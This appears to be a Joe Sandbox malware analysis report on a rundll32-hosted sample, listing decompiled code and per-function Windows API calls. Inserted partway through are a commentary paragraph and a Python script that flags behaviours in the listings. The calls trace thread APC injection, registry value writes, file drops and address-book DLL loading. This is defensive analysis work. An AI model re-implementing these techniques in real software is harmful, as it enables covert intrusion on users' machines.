                                                          						_t91 = E00E55FBC(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E00E513CC(_v20); // second allocation failed: release the first string (E00E513CC wraps RtlFreeHeap, see subcall note below)
                                                          						} else {
                                                          							_t66 =  *0xe5a2d4; // 0x435d5a8
                                                          							_t31 = _t66 + 0xe5bbd8; // 0x73006d  (second format template)
                                                          							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12); // second output string
                                                          							 *_a16 = _v20; // hand both strings to the caller through the out-parameters
                                                          							_v24 = _v24 & 0x00000000; // success: return code 0
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E00E513CC(_v12); // free the intermediate string from E00E516F4
                                                          				}
                                                          				return _v24;
                                                          			}
                                                          Instruction addresses for the statements above (originally a side column aligned with each decompiled line, 49 entries): 0x00e5641c through 0x00e56563.

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00E56429
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 00E56469
                                                          • lstrlen.KERNEL32(00000000), ref: 00E56472
                                                          • lstrlen.KERNEL32(00000000), ref: 00E56479
                                                          • lstrlenW.KERNEL32(80000002), ref: 00E56486
                                                          • wsprintfW.USER32 ref: 00E564BF
                                                          • lstrlen.KERNEL32(?,00000004), ref: 00E564E6
                                                          • lstrlen.KERNEL32(?), ref: 00E564EF
                                                          • lstrlen.KERNEL32(?), ref: 00E564F6
                                                          • lstrlenW.KERNEL32(?), ref: 00E564FD
                                                          • wsprintfW.USER32 ref: 00E56530
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 822878831-0
                                                          • Opcode ID: 4ce60f77d3ebe87aec0d4c10b8255c009fb12a959c57889c7a4f62a540423d98
                                                          • Instruction ID: 6b65e5ec33bf4bacc18b5897c156645b2e83a0867481705d0b2e4a9db9cf19f4
                                                          • Opcode Fuzzy Hash: 4ce60f77d3ebe87aec0d4c10b8255c009fb12a959c57889c7a4f62a540423d98
                                                          • Instruction Fuzzy Hash: A3416B76900219EFCF11AFA4CD09ADE7BB5EF44319F0508A5EE04B7222D7359A58EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05579B66
                                                            • Part of subcall function 05580110: RegCloseKey.ADVAPI32(?,?,?,05579B89,00000000,00000000,00000000), ref: 05580197
                                                          • lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 05579B95
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 05579BA6
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05579BE0
                                                          • RegSetValueExA.ADVAPI32(00000004,?,00000000,00000004,?,00000004), ref: 05579C02
                                                          • RegCloseKey.ADVAPI32(?), ref: 05579C0B
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05579C21
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05579C36
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05579C4A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05579C5F
                                                          • RegCloseKey.ADVAPI32(?), ref: 05579C68
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                                          • String ID:
                                                          • API String ID: 534682438-0
                                                          • Opcode ID: 865741385aa5ec566cda867176d63393a037b00543b71e08ad1aa5d9206076c0
                                                          • Instruction ID: 5e9093a46dd40a2c2df83861e319f2fcea3bd02a86d71a0d870ea611076ce451
                                                          • Opcode Fuzzy Hash: 865741385aa5ec566cda867176d63393a037b00543b71e08ad1aa5d9206076c0
                                                          • Instruction Fuzzy Hash: 19313975510108FFDF119FA5EC8ADAE7FBEFB48310B154156F505E2060EB399A48EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0557352A
                                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000), ref: 0557353C
                                                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000), ref: 05573549
                                                          • wsprintfA.USER32 ref: 05573564
                                                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,05571A31,00000000,00000000,00000094), ref: 0557357A
                                                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 05573593
                                                          • WriteFile.KERNEL32(00000000,00000000), ref: 0557359B
                                                          • GetLastError.KERNEL32 ref: 055735A9
                                                          • CloseHandle.KERNEL32(00000000), ref: 055735B2
                                                          • GetLastError.KERNEL32(?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000,00000094), ref: 055735C3
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000), ref: 055735D3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                                          • String ID:
                                                          • API String ID: 3873609385-0
                                                          • Opcode ID: 8cfabcebf6f2246e8977d46e8211339c803ca9d448931fcb30fa761fd5c7977f
                                                          • Instruction ID: 3ed98bb8f17d9f36662f2edd32d5d290d425b5f6b3a61290094b6d27c96d6105
                                                          • Opcode Fuzzy Hash: 8cfabcebf6f2246e8977d46e8211339c803ca9d448931fcb30fa761fd5c7977f
                                                          • Instruction Fuzzy Hash: A711D571215118AFE2206B25BC8EE7B3F5CFB412BAB020526F906D2140DE291D0CA6B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,0000002C,7748D3B0,00000000,00000000,05572A10), ref: 05588EBC
                                                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 05588ECF
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 05588EF2
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 05588F01
                                                          • lstrlen.KERNEL32(00000000), ref: 05588F36
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05588F49
                                                          • lstrcpy.KERNEL32(00000004,00000000), ref: 05588F67
                                                          • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 05588F8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                          • String ID: W
                                                          • API String ID: 1974185407-655174618
                                                          • Opcode ID: d70da7ea453637018f6735a83c453f855ee35bb4c37558f4a6192c56c99f5d17
                                                          • Instruction ID: cb46f12a60e8dbc66813ba4a524313507226a394a52e07b3a08db83f9c242461
                                                          • Opcode Fuzzy Hash: d70da7ea453637018f6735a83c453f855ee35bb4c37558f4a6192c56c99f5d17
                                                          • Instruction Fuzzy Hash: 9931C071924216EFDB10EFA5DC4AEAE7FBAFF08700F054416F405A7240EB78A905DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05590D9B
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05590DBA
                                                            • Part of subcall function 05592C06: wsprintfA.USER32 ref: 05592C19
                                                            • Part of subcall function 05592C06: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05592C2B
                                                            • Part of subcall function 05592C06: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05592C55
                                                            • Part of subcall function 05592C06: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05592C68
                                                            • Part of subcall function 05592C06: CloseHandle.KERNEL32(?), ref: 05592C71
                                                          • GetLastError.KERNEL32 ref: 0559108D
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0559109D
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 055910AE
                                                          • RtlExitUserThread.NTDLL(?), ref: 055910BC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                                          • String ID:
                                                          • API String ID: 1258333524-0
                                                          • Opcode ID: 0b83c8d73ae847713ff1116d77f577a362b460c73d49fd881a64ee3b8db68bb7
                                                          • Instruction ID: f054213184a7fc8eacf446cbf3d3865d0242128565f13b8707b0f49fbbf955a6
                                                          • Opcode Fuzzy Hash: 0b83c8d73ae847713ff1116d77f577a362b460c73d49fd881a64ee3b8db68bb7
                                                          • Instruction Fuzzy Hash: 1BB16F7150465AEFEF248F21CC88EAA7BBAFF08305F104569F556D21A0EB3AE944DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
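The API listings in this section carry the triage signal of a report like this: the block above pairs VirtualAlloc with RtlExitUserThread, the block before it parses comma-separated strings with StrChrA/StrTrimA, and earlier blocks call RegCreateKeyA and RegSetValueExA under hive 80000001 (HKEY_CURRENT_USER) and write a file after GetWindowsDirectoryA/CreateFileA/WriteFile. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses blocks in this layout into per-function call lists, separates direct calls from "Part of subcall function" entries, decodes the registry hive argument, and flags the behaviours listed above. The sample text is constructed in the report's layout, and the rule names, the use of the first direct call site as a function identifier and the hive table are this example's own assumptions; Joe Sandbox's "API ID" summary is computed differently and is not reproduced here.

```python
import re

# Constructed sample in the layout of the "APIs" blocks of this report: one block per
# function, direct calls start with a bullet, calls made inside a callee are prefixed
# "Part of subcall function <addr>:". Not copied verbatim from the report.
SAMPLE_REPORT = """\
APIs
• RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0557352A
• GetWindowsDirectoryA.KERNEL32(00000000,00000104,?), ref: 0557353C
• wsprintfA.USER32 ref: 05573564
• CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003), ref: 0557357A
• WriteFile.KERNEL32(00000000,00000000), ref: 0557359B
• CloseHandle.KERNEL32(00000000), ref: 055735B2
Memory Dump Source
APIs
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05579B66
  • Part of subcall function 05580110: RegCloseKey.ADVAPI32(?), ref: 05580197
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05579BE0
• RegSetValueExA.ADVAPI32(00000004,?,00000000,00000004,?,00000004), ref: 05579C02
• RegCloseKey.ADVAPI32(?), ref: 05579C0B
Memory Dump Source
"""

# One entry: optional subcall prefix, Api.MODULE, optional (args), "ref: <addr>".
ENTRY_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Predefined hive handles (Win32 HKEY_* values); 80000001 is the one used in the report.
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}

# Behaviour rules (example's own names): every API must appear as a direct call
# of the same function. Subcall entries are deliberately not counted.
RULES = {
    "file_write_in_windows_dir": {"GetWindowsDirectoryA", "CreateFileA", "WriteFile"},
    "registry_value_write": {"RegCreateKeyA", "RegSetValueExA"},
    "virtualalloc_then_thread_exit": {"VirtualAlloc", "RtlExitUserThread"},
}


def parse_api_blocks(text):
    """Split report text into one record per 'APIs' block, with parsed call entries."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"calls": []}
            blocks.append(current)
            continue
        match = ENTRY_RE.search(stripped)
        if current is None or match is None:
            continue  # section headers such as "Memory Dump Source" end nothing explicitly
        raw_args = match.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        current["calls"].append({
            "api": match.group("api"), "module": match.group("mod"), "args": args,
            "ref": match.group("ref").upper(), "subcall_of": match.group("sub"),
        })
    for block in blocks:
        direct = [c for c in block["calls"] if c["subcall_of"] is None]
        # The report gives no function start address here, so the first direct
        # call site serves as the function identifier (an assumption of this example).
        block["first_ref"] = direct[0]["ref"] if direct else None
    return blocks


def direct_apis(block):
    return {c["api"] for c in block["calls"] if c["subcall_of"] is None}


def classify(block):
    """Rule labels whose full API set is present among the function's direct calls."""
    names = direct_apis(block)
    return sorted(label for label, needed in RULES.items() if needed <= names)


def registry_hives(block):
    """Hive names from the first argument of RegOpenKey*/RegCreateKey* calls."""
    hives = set()
    for c in block["calls"]:
        if c["api"].startswith(("RegOpenKey", "RegCreateKey")) and c["args"]:
            hive = HIVES.get(c["args"][0].upper())
            if hive:
                hives.add(hive)
    return sorted(hives)


if __name__ == "__main__":
    for block in parse_api_blocks(SAMPLE_REPORT):
        print(block["first_ref"], classify(block), registry_hives(block), sorted(direct_apis(block)))
```

The rules intentionally ignore subcall entries: the RegCloseKey reported under "Part of subcall function 05580110" belongs to a shared helper, and counting helper calls toward every caller would make unrelated functions match the same behaviour.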

                                                          APIs
                                                          • lstrlen.KERNEL32(059BB060), ref: 05571C28
                                                          • lstrlen.KERNEL32(?), ref: 05571C37
                                                          • lstrlen.KERNEL32(?), ref: 05571C44
                                                          • lstrlen.KERNEL32(00000000), ref: 05571C5C
                                                          • lstrlen.KERNEL32(?), ref: 05571C68
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05571C84
                                                          • wsprintfA.USER32 ref: 05571D66
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05571DB3
                                                          • InterlockedExchange.KERNEL32(0559C0BC,00000000), ref: 05571DD1
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05571E12
                                                            • Part of subcall function 05576312: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0557633B
                                                            • Part of subcall function 05576312: memcpy.NTDLL(00000000,?,?), ref: 0557634E
                                                            • Part of subcall function 05576312: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557635F
                                                            • Part of subcall function 05576312: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05576374
                                                            • Part of subcall function 05576312: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 055763AC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                          • String ID:
                                                          • API String ID: 4198405257-0
                                                          • Opcode ID: 489abfb5911ef41506be3a01f941bc9618b0208103f661121e0cac0465113fcd
                                                          • Instruction ID: 39e2072bd23e7a1c7d7c761645f3427a42991fef30eefce4e5522e4f387e0fe2
                                                          • Opcode Fuzzy Hash: 489abfb5911ef41506be3a01f941bc9618b0208103f661121e0cac0465113fcd
                                                          • Instruction Fuzzy Hash: 73617E71A1060AEFCF10DFA5EC85EAE7BB9FB04344F05456AF805A7200DB389A58DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0557C361: memset.NTDLL ref: 0557C383
                                                            • Part of subcall function 0557C361: CloseHandle.KERNEL32(?,?,?,?,?), ref: 0557C42D
                                                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0557C016
                                                          • CloseHandle.KERNEL32(?), ref: 0557C022
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0557C032
                                                          • lstrlenW.KERNEL32(00000000), ref: 0557C03C
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0557C04D
                                                          • wcstombs.NTDLL ref: 0557C05E
                                                          • lstrlen.KERNEL32(?), ref: 0557C06B
                                                          • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 0557C0A1
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0557C0B3
                                                          • DeleteFileW.KERNEL32(?), ref: 0557C0C1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                                          • String ID:
                                                          • API String ID: 2256351002-0
                                                          • Opcode ID: 93547667377de93c3110b9ab967e1a62b907706afff7a916a8b0e893caa454a6
                                                          • Instruction ID: 7064bcf808c0c44ab829337a2dc1f337c18c3312fd0972b13c47654fc94bc4e9
                                                          • Opcode Fuzzy Hash: 93547667377de93c3110b9ab967e1a62b907706afff7a916a8b0e893caa454a6
                                                          • Instruction Fuzzy Hash: F5315A7590011EEFCF219FA5E98A8AE7F79FF44355B01406AF902A2110DB359E58EFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0558A0F5
                                                          • CreateFileW.KERNEL32(05579E67,80000000,00000003,0559C1A8,00000003,00000000,00000000,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A112
                                                          • GetLastError.KERNEL32(?,05579E67,00000000,?,05571A31,00000000), ref: 0558A1BA
                                                            • Part of subcall function 0558FA1F: lstrlen.KERNEL32(?,00000000,0558A13A,00000027,0559C1A8,?,00000000,?,?,0558A13A,?,00000001,?,05579E67,00000000,?), ref: 0558FA55
                                                            • Part of subcall function 0558FA1F: lstrcpy.KERNEL32(00000000,00000000), ref: 0558FA79
                                                            • Part of subcall function 0558FA1F: lstrcat.KERNEL32(00000000,00000000), ref: 0558FA81
                                                          • GetFileSize.KERNEL32(05579E67,00000000,?,00000001,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A145
                                                          • CreateFileMappingA.KERNEL32(05579E67,0559C1A8,00000002,00000000,00000000,05579E67), ref: 0558A159
                                                          • lstrlen.KERNEL32(05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A175
                                                          • lstrcpy.KERNEL32(?,05579E67), ref: 0558A185
                                                          • GetLastError.KERNEL32(?,05579E67,00000000,?,05571A31,00000000), ref: 0558A18D
                                                          • HeapFree.KERNEL32(00000000,05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A1A0
                                                          • CloseHandle.KERNEL32(05579E67,?,00000001,?,05579E67), ref: 0558A1B2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                          • String ID:
                                                          • API String ID: 194907169-0
                                                          • Opcode ID: 883bc8f8f0ba32d1b5481a4a955ee2a52f12f3ebf6bbd927a98d845a96c1529c
                                                          • Instruction ID: a2da5316398d7d65687632f4703e24999e400c057e6d6bdd123b16d3dade2813
                                                          • Opcode Fuzzy Hash: 883bc8f8f0ba32d1b5481a4a955ee2a52f12f3ebf6bbd927a98d845a96c1529c
                                                          • Instruction Fuzzy Hash: DD212170900208FFDB109FA5D8899ADBFB9FF04351F51846AF506E6250DB38AE48EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05591E36
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05591E42
                                                          • GetModuleHandleA.KERNEL32(?,059B9732,00000000,?,00000000), ref: 05591E62
                                                          • GetProcAddress.KERNEL32(00000000), ref: 05591E69
                                                          • Thread32First.KERNEL32(?,0000001C), ref: 05591E79
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 05591E94
                                                          • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 05591EA5
                                                          • CloseHandle.KERNEL32(00000000), ref: 05591EAC
                                                          • Thread32Next.KERNEL32(?,0000001C), ref: 05591EB5
                                                          • CloseHandle.KERNEL32(?), ref: 05591EC1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                          • String ID:
                                                          • API String ID: 2341152533-0
                                                          • Opcode ID: 00ec88ed4363461f178f527c4c1a1d3a7f39c1bc531ba500d8e59c6b96914be7
                                                          • Instruction ID: c8c6c82d036dbe158b6efea07f6cb97788f80fa77a4f2df9b7851eaff4329e3e
                                                          • Opcode Fuzzy Hash: 00ec88ed4363461f178f527c4c1a1d3a7f39c1bc531ba500d8e59c6b96914be7
                                                          • Instruction Fuzzy Hash: AC216D7290011DAFDF059FE0DC89DAE7F7EFB48295B01412AF601A6150DB399949EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetEvent.KERNEL32(?,7519F560,05590797,?,?,0558BCB5), ref: 0557BE0F
                                                            • Part of subcall function 0557DB47: InterlockedExchange.KERNEL32(?,000000FF), ref: 0557DB4E
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 0557BE2F
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE38
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE42
                                                          • RtlEnterCriticalSection.NTDLL(00000008), ref: 0557BE4A
                                                          • RtlLeaveCriticalSection.NTDLL(00000008), ref: 0557BE62
                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE71
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE7E
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE89
                                                          • RtlDeleteCriticalSection.NTDLL(00000008), ref: 0557BE93
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 1408595562-0
                                                          • Opcode ID: b56c59d49cf5a8f36114e41afdf3005dc4f8b918461033e57e4b91792bfbead4
                                                          • Instruction ID: 3fa28a21fd12494022959133e44b2011b2b1df2af49264176141870154142c63
                                                          • Opcode Fuzzy Hash: b56c59d49cf5a8f36114e41afdf3005dc4f8b918461033e57e4b91792bfbead4
                                                          • Instruction Fuzzy Hash: 2D119E31200719DFCB20AF65FC4996BBBB9BF407207050916F69383210EB39F448DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000001,00000000,00000104,00000000,0557B62D,00000000,00000001,?,?,?), ref: 055816F5
                                                          • lstrlen.KERNEL32(?), ref: 05581705
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05581739
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05581764
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05581783
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055817E4
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05581806
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                          • String ID: W
                                                          • API String ID: 3204852930-655174618
                                                          • Opcode ID: e9d940e0b88066a054d67d137f19e643a4357bb66a1010542057eef814fc1624
                                                          • Instruction ID: 5d329b167dcd746ee768fc3d7c13ee777a3a2fbfc013dc06ff4d1cb7cc13db7d
                                                          • Opcode Fuzzy Hash: e9d940e0b88066a054d67d137f19e643a4357bb66a1010542057eef814fc1624
                                                          • Instruction Fuzzy Hash: 664158B1D0060AEFDF11EF95CC85ABE7BB9FF04244F14442AE905A7200E7319A59DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,00000000,75145520,?,?,?,0557D50C,0000001C,00000000,00000000), ref: 055814B6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 055814CC
                                                          • memcpy.NTDLL(00000010,?,00000000,?,?,?,0557D50C,0000001C), ref: 05581502
                                                          • memcpy.NTDLL(00000010,00000000,0557D50C,?,?,?,0557D50C), ref: 0558151D
                                                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0558153B
                                                          • GetLastError.KERNEL32(?,?,?,0557D50C), ref: 05581545
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,0557D50C), ref: 05581568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                          • String ID: (
                                                          • API String ID: 2237239663-3887548279
                                                          • Opcode ID: bff8272ad6fd0cb352fb1b7823fd031b95613a365d7e76a0b1ddff9edb71a710
                                                          • Instruction ID: cebcfc1445e90a9ac739faf3293a4f28d5378e3d251a7f4258c99f22c44dd263
                                                          • Opcode Fuzzy Hash: bff8272ad6fd0cb352fb1b7823fd031b95613a365d7e76a0b1ddff9edb71a710
                                                          • Instruction Fuzzy Hash: 1C31B432510609EFCB20DFA5D885AABBFB9FB44350F014426FD06E2210E6349A5DDFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 0558B481
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558B539
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0558B4CF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558B4E8
                                                          • GetLastError.KERNEL32 ref: 0558B507
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0558B519
                                                          • GetLastError.KERNEL32 ref: 0558B521
                                                          Strings
                                                          • Software\Microsoft\WAB\DLLPath, xrefs: 0558B472
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
